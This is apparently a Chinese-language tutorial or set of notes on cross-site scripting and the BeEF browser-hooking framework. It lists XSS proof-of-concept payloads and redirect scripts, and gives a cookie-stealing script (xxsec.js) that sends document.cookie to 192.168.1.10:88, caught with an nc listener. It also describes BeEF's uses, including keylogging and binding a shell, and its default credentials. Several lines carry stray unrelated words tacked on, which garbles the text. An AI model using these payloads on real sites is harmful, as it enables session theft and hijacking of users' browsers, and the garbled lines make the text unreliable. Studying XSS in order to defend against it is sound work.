攻擊web客戶端javascript
客戶端腳本語言(彈窗,廣告,在瀏覽器中執行,javascript)php
javascript--與java語言無關,使用最廣的客戶端腳本語言html
xss(cross-site scripting)java
經過web站點漏洞,向客戶端交付惡意腳本代碼,實現對客戶端攻擊目的web
注入客戶端腳本代碼,盜取cookie,重定向shell
使用場景:瀏覽器
直接嵌入html:<script> alert('xss'); </script>ruby
元素標籤事件:<body onload=alert('xss')>服務器
圖片標籤:<img src="javascript:alert('xss');">cookie
其餘標籤:<iframe>,<div>,and<link>
dom對象,篡改頁面內容
漏洞造成的根源:
服務器對用戶提交數據過濾不嚴
提交給服務器的腳本被直接返回給其餘客戶端執行
腳本在客戶端執行惡意操做
xss漏洞類型
存儲型(持久型)
反射型(非持久)
DOM型
漏洞poc
<script> alert('xss')</script> 驗證彈窗
<a href=http://192.168.1.10>click 嵌入連接
<img src=http://192.168.1.10/xxsec.jpeg onerror=alert('xss')> 嵌入192.168.1.10的圖片
<script>window.location='http://192.168.1.10'</script> 提交重定向到192.168.1.10
反射型xss
彈窗驗證
<a href=http://192.168.1.10>click 點擊click就跳轉到連接
<img src=http://192.168.1.10/xxsec.jpeg onerror=alert('xss')> 嵌入192.168.1.10的圖片
<script>window.location='http://192.168.1.10'</script> 提交重定向到192.168.1.10
xss竊取cookie
<script src=http://192.168.1.10/xxsec.js></script>
xxsec.js源碼
var img = new Image();
img.src = "http://192.168.1.10:88/cookies.php?cookie="+document.cookie;(把cookie發送到192.168.1.10 88端口)
在本機服務器寫好源碼,而後用nc監聽好本機的88端口
執行就獲取到cookie了
存儲型xss
長期存儲於服務器端,每次用戶訪問都會被執行javascript腳本
name:客戶端表單長度限制--客戶端,截斷代理
竊取cookie源碼
<script src=http://192.168.1.10/xxsec.js></script>
xxsec.js源碼
var img = new Image();
img.src = "http://192.168.1.10:88/cookies.php?cookie="+document.cookie;(把cookie發送到192.168.1.10 88端口)
成功獲取cookie
beef
生成,交互payload
ruby語言編寫
服務器端--------管理hooked客戶端
客戶端---------運行客戶端瀏覽器的javascript腳本(hook)
瀏覽器攻擊面:
應用廣泛轉移到b/s架構,瀏覽器成爲統一客戶端程序
結合社會工程學方法對瀏覽器進行攻擊,攻擊瀏覽器用戶
經過注入js腳本,利用瀏覽器攻擊其餘網站
攻擊手段:
利用網站xss漏洞實現攻擊
誘使客戶端訪問含有hook的僞造站點
結合中間人攻擊注入hook腳本
常見用途:
鍵盤記錄
網絡掃描
瀏覽器信息收集
綁定shell
與metasploit集成
默認用戶名密碼beef
Details:瀏覽器,插件版本信息,操做系統信息
Logs:瀏覽器動做----焦點變化,鼠標點擊,信息輸入
Commands:命令模塊
綠色模塊:表示模塊適合目標瀏覽器,而且執行結果被客戶端不可見
紅色模塊:表示模塊不適用當前用戶,有些紅色模塊也能夠正常執行
橙色模塊:模塊可用,但結果對用戶可見(CAM彈窗申請權限等)
灰色模塊:模塊未在目標瀏覽器上測試過
主要模塊
Browsers
Exploits
Host
Persistence
Network
友情連接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn